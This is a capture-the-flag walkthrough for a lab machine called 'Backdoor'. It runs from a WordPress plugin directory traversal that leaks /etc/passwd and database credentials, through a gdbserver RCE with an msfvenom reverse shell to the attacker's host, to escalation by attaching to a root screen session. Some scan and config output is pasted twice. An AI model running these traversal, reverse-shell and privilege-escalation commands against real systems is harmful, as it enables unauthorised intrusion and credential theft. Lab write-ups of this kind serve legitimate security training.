Target IP: 10.129.96.68
Challenge Description: N/A.
I performed a port scan using the command sudo nmap -sS 10.129.96.68 -p- against the target machine and obtained the result shown above. By the looks of it, there are three TCP ports open on the target machine: SSH, HTTP, and some other application on port 1337. Time to gain more information from these ports using an aggressive port scan.
Running an aggressive port scan using the command sudo nmap -sV -A 10.129.96.68 -p 22,80,1337 against the target machine returns the result shown above. The target machine seems to be running a Wordpress web application on port 80. There is another weird application too on the port 1337.
Port 80: HTTP
The Wordpress webpage above is displayed for this web application. I hovered over the Home button and identified the hostname is backdoor.htb. I inserted this hostname inside my /etc/hosts file too.
Using the Wappalyzer tool, I identified the target machine is running Wordpress 5.8.1 as shown above. I did some manual enumeration and code scanning, but I did not find anything useful. SInce it is running Wordpress, I can use the tool wpscan to perform enumeration. I wish to enumerate what plugins are being used by the web application, and who the users are.
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/Backdoor]
└─$ wpscan --url http://backdoor.htb --enumerate ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://backdoor.htb/ [10.129.96.68]
[+] Started: Wed May 15 14:05:10 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://backdoor.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://backdoor.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://backdoor.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://backdoor.htb/wp-content/themes/twentyseventeen/
| Last Updated: 2024-04-02T00:00:00.000Z
| Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.6
| Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:11:42 <========================================> (105493 / 105493) 100.00% Time: 00:11:42
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://backdoor.htb/wp-content/plugins/akismet/
| Latest Version: 5.3.2
| Last Updated: 2024-03-21T00:55:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.
[+] ebook-download
| Location: http://backdoor.htb/wp-content/plugins/ebook-download/
| Last Updated: 2020-03-12T12:52:00.000Z
| Readme: http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
| [!] The version is out of date, the latest version is 1.5
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/ebook-download/, status: 200
|
| Version: 1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed May 15 14:17:34 2024
[+] Requests Done: 105502
[+] Cached Requests: 40
[+] Data Sent: 28.222 MB
[+] Data Received: 14.11 MB
[+] Memory used: 461.707 MB
[+] Elapsed time: 00:12:24┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/Backdoor]
└─$ wpscan --url http://backdoor.htb --enumerate ap --plugins-detection aggressive
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://backdoor.htb/ [10.129.96.68]
[+] Started: Wed May 15 14:05:10 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://backdoor.htb/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://backdoor.htb/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://backdoor.htb/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://backdoor.htb/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.8.1 identified (Insecure, released on 2021-09-09).
| Found By: Rss Generator (Passive Detection)
| - http://backdoor.htb/index.php/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
| - http://backdoor.htb/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.8.1</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://backdoor.htb/wp-content/themes/twentyseventeen/
| Last Updated: 2024-04-02T00:00:00.000Z
| Readme: http://backdoor.htb/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 3.6
| Style URL: http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.8 (80% confidence)
| Found By: Style (Passive Detection)
| - http://backdoor.htb/wp-content/themes/twentyseventeen/style.css?ver=20201208, Match: 'Version: 2.8'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:11:42 <========================================> (105493 / 105493) 100.00% Time: 00:11:42
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] akismet
| Location: http://backdoor.htb/wp-content/plugins/akismet/
| Latest Version: 5.3.2
| Last Updated: 2024-03-21T00:55:00.000Z
|
| Found By: Known Locations (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/akismet/, status: 403
|
| The version could not be determined.
[+] ebook-download
| Location: http://backdoor.htb/wp-content/plugins/ebook-download/
| Last Updated: 2020-03-12T12:52:00.000Z
| Readme: http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
| [!] The version is out of date, the latest version is 1.5
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/ebook-download/, status: 200
|
| Version: 1.1 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://backdoor.htb/wp-content/plugins/ebook-download/readme.txt
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed May 15 14:17:34 2024
[+] Requests Done: 105502
[+] Cached Requests: 40
[+] Data Sent: 28.222 MB
[+] Data Received: 14.11 MB
[+] Memory used: 461.707 MB
[+] Elapsed time: 00:12:24I ran the command wpscan --url http://backdoor.htb --enumerate ap --plugins-detection aggressive and obtained the result shown above. While enumerating for plugins using the default settings, this tool wpscan did not find anything until I used the flag --plugins-detection aggressive. This tool successfully detected two plugins: akismet with an unknown version, and ebook-download 1.1, as shown above. I also used the command wpscan --url http://backdoor.htb --enumerate u to identify the only user called admin on the website. Are the plugins used by the web application vulnerable?
It looks like the plugin ebook-download 1.1 is vulnerable to directory traversal attacks, as shown above. This vulnerability has the CVE ID of CVE-2016-10924. The PoC has also been provided for this verified exploit. Time to test it against the target machine.
Using the command curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd , I managed to read the /etc/passwd file on the target machine as shown above. On the target machine, the user exists. I tried to read this user's SSH key, but I had no luck. Time to search for any useful files.
┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/Backdoor]
└─$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
../../../wp-config.php../../../wp-config.php../../../wp-config.php<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/* THIS IS CUSTOM CODE CREATED AT ZEROFRACTAL TO MAKE SITE ACCESS DYNAMIC */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
<script>window.close()</script>┌──(kali㉿kali)-[~/Desktop/Lab-Resource/Completed/Backdoor]
└─$ curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
../../../wp-config.php../../../wp-config.php../../../wp-config.php<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress' );
/** MySQL database username */
define( 'DB_USER', 'wordpressuser' );
/** MySQL database password */
define( 'DB_PASSWORD', 'MQYBJSaD#DxG6qbm' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/* THIS IS CUSTOM CODE CREATED AT ZEROFRACTAL TO MAKE SITE ACCESS DYNAMIC */
$currenthost = "http://".$_SERVER['HTTP_HOST'];
$currentpath = preg_replace('@/+$@','',dirname($_SERVER['SCRIPT_NAME']));
$currentpath = preg_replace('/\/wp.+/','',$currentpath);
define('WP_HOME',$currenthost.$currentpath);
define('WP_SITEURL',$currenthost.$currentpath);
define('WP_CONTENT_URL', $currenthost.$currentpath.'/wp-content');
define('WP_PLUGIN_URL', $currenthost.$currentpath.'/wp-content/plugins');
define('DOMAIN_CURRENT_SITE', $currenthost.$currentpath );
@define('ADMIN_COOKIE_PATH', './');
define( 'AUTH_KEY', 'put your unique phrase here' );
define( 'SECURE_AUTH_KEY', 'put your unique phrase here' );
define( 'LOGGED_IN_KEY', 'put your unique phrase here' );
define( 'NONCE_KEY', 'put your unique phrase here' );
define( 'AUTH_SALT', 'put your unique phrase here' );
define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
define( 'LOGGED_IN_SALT', 'put your unique phrase here' );
define( 'NONCE_SALT', 'put your unique phrase here' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';
<script>window.close()</script>One interesting file is the wp-config.php. I ran the command curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php and accessed the wp-config.php file, as shown above. This file contains the credentials wordpressuser:MQYBJSaD#DxG6qbm. I tried to login using this new credentials on the web application, but I had no luck. I also tried to login via SSH, but no luck. Running the command ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -u http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=FUZZ -fw 1, I notice /proc is available. From previous knowledege, I know it is possible to get process information using LFI. Maybe I can try to identify what application is running on port 1337 on the target machine?
I used the command curl http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/proc/sched_debug and obtained the result shown above. I notice there is gdbserver running on the target machine with the PID of 1810, as shown above. Now I can use the /proc/1810/cmdline to obtain more information about this application. However, I will need to use the web browser to download the file.
And bingo! The target machine seems to be running gdbserver on port 1337, as shown above. Obtaining the application version is not possible.
I ran the command searchsploit "gdbserver" and found out it is vulnerable to RCE. Using the command searchsploit -m linux/remote/50539.py, I made a copy of the exploit on my machine.
I looked into the code of the exploit and found out how to use it. First, I will need to generate a shellcode using msfvenom. And activate a listener to catch the reverse shell connection. To generate the shellcode, I used the command msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.88 LPORT=8443 PrependFork=true -o rev.bin. Then I started a listener on my machine at port 8443 and deployed the exploit using the command python3 50539.py 10.129.96.68:1337 rev.bin.
And now I have a foothold on the target machine with the session as user, as shown above. I upgraded my shell using the command python3 -c 'import pty; pty.spawn("/bin/bash");'. Now I have a foothold.
Running the command find / -perm -u=s -type f 2>/dev/null shows the binary /usr/bin/screen has SUID bit set, as shown above. However, I cannot exploit this binary using GTFObins. Maybe there is another session running on the target machine with screen? Or the application is vulnerable? I ran the commnad screen -v and obtained the version number 4.08.00. This is not vulnerable to local privilege escalation.
Running the command ps -auxw, I obtained the information shown above. It seems like there is another screen session that is being run by the user root.
I executed the command screen -ls root/ and obtained the session information above. There exists a root screen session with the ID 1018.root.
To obtain the higher privileged screen session, I ran the command screen -x 1018.root/. Then I executed the command TERM=screen screen -x root/1018. And bingo! Now I have a root shell on the target machine :) Now I have full access over the target machine as root. GG.
The two flags are shown above.